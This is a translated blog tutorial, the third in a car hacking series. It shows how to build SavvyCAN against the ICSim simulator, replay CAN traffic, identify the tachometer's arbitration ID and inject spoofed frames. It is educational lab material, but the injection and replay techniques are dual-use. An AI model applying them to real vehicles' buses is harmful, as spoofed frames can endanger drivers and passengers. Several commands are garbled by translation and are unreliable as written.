Car Hacking: The ultimate guide! - Part III

In the previous two parts we saw how to install the car simulation on our machine and the necessary programs that we should use along with the necessary equipment that we will need. In today's article we will present the exploitation process in detail.

cyberpunk neon retro hacker car se

We will now look at what SavvyCAN is and use it with ICSIM. After that, we will look at how to perform fuzzing and scripting with SavvyCAN.

 

 

SavvyCAN

There are various softwares that will help you to monitor and filter the CAN communication.

There are expensive and proprietary tools, as well as free and open source tools.

The purpose of this article is to help you get started with car hacking at no cost. So expensive tools are not on our list.

I have already written in detail about the cheap and free alternative to these expensive CAN communication tools. Tools like can-utils, Wireshark work just fine.

But SavvyCAN provides much more. For beginners, it offers a nice GUI, which helps you easily navigate, filter packages, IDs, etc. For those who are already into car hacking, SavvyCAN offers truly great features. My personal favorite features include the ability to run scripts in CAN framework,

Let's look at the definition of SavvyCAN from their website.

“SavvyCAN is a C++ program based on cross-platform QT. It is a CAN bus reverse engineering and capture tool. Originally written to use EVTV hardware such as EVTVDue and CANDue. It has since been extended to use any socketCAN compatible device as well as the Macchina M2 and Teensy 3.x boards. It can capture and send to multiple bus and CAN devices at the same time.”

You can find more information here:  https://www.savvycan.com/

I find it very easy to use SavvyCAN despite can-utils . Again, let's not start the debate between which tool is best and which is not, as long as it serves your purpose.

1t0o6sskp87avdbt vteidq 1 2048x864

SavvyCAN installation

Installing SavvyCAN is a really easy and simple process. You can download prefabricated binaries for Linux, Mac and Windows from  address https://www.savvycan.com

Install and run on Ubuntu

wget https://github.com/collin80/SavvyCAN/releases/download/V199.1/SavvyCAN-305dafd-x86_64.AppImage

No installation required as you download the appimage, make it executable and run it!

chmod 744 SavvyCAN-305dafd-x86_64.AppImage
# and
./SavvyCAN-305dafd-x86_64.AppImage

You can run SavvyCAN

1j7p1mrnqgh nqd n3jdk7q

You can play with SavvyCAN for a while. If you want to use SavvyCAN with Macchina M2 or any other compatible hardware, you don't need any additional installation.

We plan to use SavvyCAN with ICSim, so we need to install it  qtserialbus .

Once you open the SavvyCAN window, if you navigate to Connection -> Open Connection -> Add New Connection, and you will see that the  qtserialbus  is off.

11xi8kqwlxa 6f0iwmmzcrq

Let's start with its installation  qtserialbus  so we can use it with ICSim.

Installing qt5

$ wget https://download.qt.io/official_releases/qt/5.14/5.14.4/qt-opensource-linux-x64-5.14.2.run

After downloading qt5, you need to install / run it

$ chmod a + x ./qt-opensource-linux-x64-5.14.2.run
$ sudo ./qt-opensource-linux-x64-5.14.2.run
1gegqxcjhupyuzzzncavt6q
11xi8kqwlxa 6f0iwmmzcrq 1 1024x620

Make a note of the route name, you will need it later.

Once qt5 is installed, you need to install qtserialbus, as it is not included in the official Ubuntu repository. So we have to do it ourselves.

Install qtserialbus

$ sudo apt install qtdeclarative5-dev qttools5-dev g ++
$ git clone https://github.com/qt/qtserialbus
$ cd qtserialbus
$ /home/y0g3sh/Qt5.14.2/5.14.2/gcc_64/bin/qmake .
$ make
$ sudo make install

Build SavvyCAN

For the use of qtserialbus, its SavvyCAN  App Image, the file you downloaded earlier will not work. SavvyCAN must be built with qmake.

$ git clone https://github.com/collin80/SavvyCAN $ cd SavvyCAN $ /home/y0g3sh/Qt5.14.2/5.14.2/gcc_64/bin/qmake CONFIG + = debug $ make
13jlip6vd17coz7vgq6znfg

It will take some time to install.

Once everything is installed, start the ICSim simulator, start everything except the can-utils. Instead of using can-utils to record CAN communication, we will use SocketCAN.

Start SavvyCAN

Start the SavvyCAN we just created and not the appimage we downloaded earlier.

Remember, if you want to run this on a real car and not use it with qtserialbus, you can still use appimages and not have to go through all that hassle of of SavvyCAN.

$ cd SavvyCAN $ ./SavvyCAN

You can now open the login window and you will notice that QT SerialBus is enabled.

1icphcwmpj0hcedvxkkjhza

Add vcan0 to SocketCAN

To make a new connection to SavvyCAN,

  1. Open SavvyCAN
  2. Transition  on  menu LOG IN ->  Open a login window  ->  Add a new device connection
  3. Select the connection with the following setting

Connection type as  QT SerialBus Devices
SerialBus Device type as  socketcan
Port as  vcan0

1pgayq6c1omsehh2vevzsuw

Then create a new connection.
Once the connection is complete, you can see the CAN frameworks appear in the SavvyCAN window, which is a good sign that everything is working fine and well.

1j7p1mrnqgh nqd n3jdk7q 1

To better understand SavvyCAN, let's do the same things we did earlier using can-utils, but this time with SavvyCAN.

SavvyCAN provides a nice, intuitive interface to filter ID frames. You can remove the selection of IDs you do not need from the right pane. This way you can quickly identify the associated ID.

Another very nice feature is the "Replacement Mode". If this option is enabled, the frames will be replaced in the same order.

1yith1opww81foiq2gu6gvq

Replay Attack

Performing a Replay Attack using SavvyCAN is much easier. You can open the playback options in the Send Frames menu. You can either upload data from a file or upload it directly from the recorded data. You can also choose which ID to repeat from the ID filter menu.

Determination of arbitration ID

Many ask me this question, about how to identify which ID does what in a car. Finding arbitration IDs can sometimes be very difficult.

SavvyCAN provides many RE tools. One of the ones I use most often is "Sniffer". This allows me to "fade" inactive bytes and quickly identify IDs.

For example, let's look at the tachometer ID. To identify the tachometer ID, I will open Sniffer and deactivate the inactive bytes.

The way I identify them is, let's say there are 20 IDs available. I turn off at least a third of them - I run the power in the car / ICSim - I notice the change in frames. I do this until I am left with a single ID.

Let's look at Sniffer, one of SavvyCAN RE tools in action.

1rhef8ut1fgxzintrqcbjyq

Here I did not find any changes in the bytes that correspond to my action. So I will move on to other IDs.

1c5isd8 nzya3rsa59gzixw

It seems that 0x244 is what we are looking for. You can notice the pattern in the change bytes when the accelerator is pressed. As the speed increases, the tachometer shows the change in the 3rd and 4th bytes (counting from Zeroth Byte)

You can do this for all actions available in ICSim.

Send custom frames

SavvyCAN also has another feature that you can modify packages on the go when sending custom frames. To do this, you must open the Frame Sender from the Send Frames menu.

Let's "fool" the tachometer. From the example above, when we cleaned the packages, we noticed how the tachometer works.

The 3rd and 4th Bytes increase with increasing throttle. So what we will do is send the custom frame, modify the bytes on the go to observe the change in the tachometer.

The data column will consist of hexadecimal values, the id should be in the format 0x123, the trigger should be the value in ms, the between each frame and the modification must consist of modification in bytes.

Example what I would like to do is, I want to send to Bus 0, ID 0x244 (tachometer), data as 0x00 0x00 0x00 0x00 0x00 and increase the 3rd byte by 2 each time, so in the modification, you can write d3 = d3 +2. When done, make sure that the Enable check box is selected.

1urcxnv1lph3ib4hyvzeoha

 

Somewhere here ended the series of Car Hacking guides.

I hope you enjoyed it and found it interesting. I'm waiting for them and your observations, as well as recommending similar programs of your own as well as methods you use.

iGuRu.gr The Best Technology Site in Greecefgns

every publication, directly to your inbox

Join the 2.100 registrants.
Car Hacking, iguru

Written by Anastasis Vasileiadis

Translations are like women. When they are beautiful they are not faithful and when they are faithful they are not beautiful.

Leave a reply

Your email address is not published. Required fields are mentioned with *

Your message will not be published if:
1. Contains insulting, defamatory, racist, offensive or inappropriate comments.
2. Causes harm to minors.
3. It interferes with the privacy and individual and social rights of other users.
4. Advertises products or services or websites.
5. Contains personal information (address, phone, etc.).